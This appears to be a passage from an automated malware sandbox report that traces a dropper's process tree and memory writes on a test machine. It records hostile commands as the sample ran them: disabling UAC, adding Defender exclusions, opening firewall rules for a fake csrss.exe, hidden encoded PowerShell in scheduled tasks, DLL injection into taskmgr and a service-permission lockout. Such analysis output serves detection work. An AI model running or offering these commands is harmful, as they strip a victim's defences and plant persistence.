ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeregasm.exe9J0qa6e7aiaDLK5JDqoWIdOI.exedGRFal8qQzpgtFutf7LbHsxR.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exedescription pid Process procid_target PID 2256 wrote to memory of 2844 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 87 PID 2256 wrote to memory of 2844 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 87 PID 2256 wrote to memory of 2152 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 88 PID 2256 wrote to memory of 2152 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 88 PID 2256 wrote to memory of 2152 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 88 PID 2256 wrote to memory of 2816 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 91 PID 2256 wrote to memory of 2816 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 91 PID 2256 wrote to memory of 2816 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 91 PID 2256 wrote to memory of 3552 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 92 PID 2256 wrote to memory of 3552 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 92 PID 2256 wrote to memory of 3552 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 92 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 3380 wrote to memory of 1672 3380 regasm.exe 99 PID 3380 wrote to memory of 1672 3380 regasm.exe 99 PID 3380 wrote to memory of 1672 3380 regasm.exe 99 PID 3380 wrote to memory of 2696 3380 regasm.exe 101 PID 3380 wrote to memory of 2696 3380 regasm.exe 101 PID 3380 wrote to memory of 2696 3380 regasm.exe 101 PID 3380 wrote to memory of 2772 3380 regasm.exe 103 PID 3380 wrote to memory of 2772 3380 regasm.exe 103 PID 3380 wrote to memory of 2772 3380 regasm.exe 103 PID 3380 wrote to memory of 4988 3380 regasm.exe 105 PID 3380 wrote to memory of 4988 3380 regasm.exe 105 PID 3380 wrote to memory of 4988 3380 regasm.exe 105 PID 3380 wrote to memory of 3420 3380 regasm.exe 107 PID 3380 wrote to memory of 3420 3380 regasm.exe 107 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 3380 wrote to memory of 1556 3380 regasm.exe 109 PID 3380 wrote to memory of 1556 3380 regasm.exe 109 PID 3380 wrote to memory of 1556 3380 regasm.exe 109 PID 1672 wrote to memory of 820 1672 dGRFal8qQzpgtFutf7LbHsxR.exe 112 PID 1672 wrote to memory of 820 1672 dGRFal8qQzpgtFutf7LbHsxR.exe 112 PID 1672 wrote to memory of 820 1672 dGRFal8qQzpgtFutf7LbHsxR.exe 112 PID 3380 wrote to memory of 1308 3380 regasm.exe 115 PID 3380 wrote to memory of 1308 3380 regasm.exe 115 PID 3380 wrote to memory of 1308 3380 regasm.exe 115 PID 1308 wrote to memory of 888 1308 LfewfClIhATqHqW1CxsJIhoA.exe 116 PID 1308 wrote to memory of 888 1308 LfewfClIhATqHqW1CxsJIhoA.exe 116 PID 1308 wrote to memory of 888 1308 LfewfClIhATqHqW1CxsJIhoA.exe 116 PID 1308 wrote to memory of 4820 1308 LfewfClIhATqHqW1CxsJIhoA.exe 118 PID 1308 wrote to memory of 4820 1308 LfewfClIhATqHqW1CxsJIhoA.exe 118 PID 1308 wrote to memory of 4820 1308 LfewfClIhATqHqW1CxsJIhoA.exe 118 PID 1308 wrote to memory of 2996 1308 LfewfClIhATqHqW1CxsJIhoA.exe 119 PID 1308 wrote to memory of 2996 1308 LfewfClIhATqHqW1CxsJIhoA.exe 119 PID 1308 wrote to memory of 2996 1308 LfewfClIhATqHqW1CxsJIhoA.exe 119 PID 2996 wrote to memory of 3916 2996 LfewfClIhATqHqW1CxsJIhoA.exe 120 PID 2996 wrote to memory of 3916 2996 LfewfClIhATqHqW1CxsJIhoA.exe 120 -
System policy modification 1 TTPs 1 IoCs
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2424
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5568
-
-
C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe"C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe"1⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵PID:2152
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵PID:2816
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵PID:3552
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Users\Admin\Pictures\dGRFal8qQzpgtFutf7LbHsxR.exe"C:\Users\Admin\Pictures\dGRFal8qQzpgtFutf7LbHsxR.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe"C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:820 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe"5⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe"C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe7⤵PID:4668
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:3084
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 820 -s 32685⤵
- Program crash
PID:5952
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1ag.1.exe"C:\Users\Admin\AppData\Local\Temp\u1ag.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:5432
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:5880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:6004
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 15564⤵
- Program crash
PID:3080
-
-
-
C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe"C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe"3⤵
- Executes dropped EXE
PID:2696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6040
-
-
C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe"C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe"4⤵PID:5904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4988
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:3460
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5744
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1980
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2208
-
-
-
-
C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe"C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe"3⤵
- Executes dropped EXE
PID:2772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6032
-
-
C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe"C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe"4⤵PID:5852
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5776
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5520
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:6080
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5760
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6116
-
-
-
-
C:\Users\Admin\Pictures\9J0qa6e7aiaDLK5JDqoWIdOI.exe"C:\Users\Admin\Pictures\9J0qa6e7aiaDLK5JDqoWIdOI.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 6325⤵
- Program crash
PID:5728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 6445⤵
- Program crash
PID:5144
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 8724⤵
- Program crash
PID:3852
-
-
-
C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe"C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe"3⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3420
-
-
C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe"C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe"3⤵
- Executes dropped EXE
PID:1556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6048
-
-
C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe"C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe"4⤵PID:1012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4080
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:1672
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5732
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5452
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6084
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵PID:6056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5512
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5196
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:5704
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵PID:5140
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:4372
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵PID:3220
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:1112
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:4668
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe"C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exeC:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6f66e1a8,0x6f66e1b4,0x6f66e1c04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:888
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LfewfClIhATqHqW1CxsJIhoA.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LfewfClIhATqHqW1CxsJIhoA.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4820
-
-
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe"C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1308 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328125931" --session-guid=e2d223d4-5c1c-42e9-b90e-18b38193d849 --server-tracking-blob=OWJmNTFiYTI0NWJlZWIzYzQyYzI4NDFhOGQxZDdlYmE1ZjQyNTM2NTIxMTdkNjc5ZjJiMzA2MDhkOTFiYTQ2MTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzA3NjYuOTA1MSIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjM1MTBlNjg0LWE0Y2ItNDU0NC05ODkxLWE2MjI2OTFkNjc1ZiJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exeC:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6e04e1a8,0x6e04e1b4,0x6e04e1c05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3916
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:5780
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x5c0040,0x5c004c,0x5c00585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1440
-
-
-
-
C:\Users\Admin\Pictures\9As7Ub276Pn8UYWeX7WAnwst.exe"C:\Users\Admin\Pictures\9As7Ub276Pn8UYWeX7WAnwst.exe"3⤵
- Executes dropped EXE
PID:5368 -
C:\Users\Admin\AppData\Local\Temp\7zS6EB3.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5788 -
C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe.\Install.exe /WZFcdidyRl "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:5864 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:5512
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:3676
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5880
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:5940
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:4140
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:2392
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5264
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:5580
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcJakxJLt" /SC once /ST 08:15:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:5384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcJakxJLt"6⤵PID:488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcJakxJLt"6⤵PID:5148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\WoogSGn.exe\" id /Vfsite_idZiD 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5880
-
-
-
-
-
C:\Users\Admin\Pictures\5TVfzHVntQFq0XimVhZ7m8WF.exe"C:\Users\Admin\Pictures\5TVfzHVntQFq0XimVhZ7m8WF.exe"3⤵
- Executes dropped EXE
PID:5376 -
C:\Users\Admin\AppData\Local\Temp\7zS6F3F.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5796 -
C:\Users\Admin\AppData\Local\Temp\7zSA38E.tmp\Install.exe.\Install.exe /WZFcdidyRl "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:1400 -
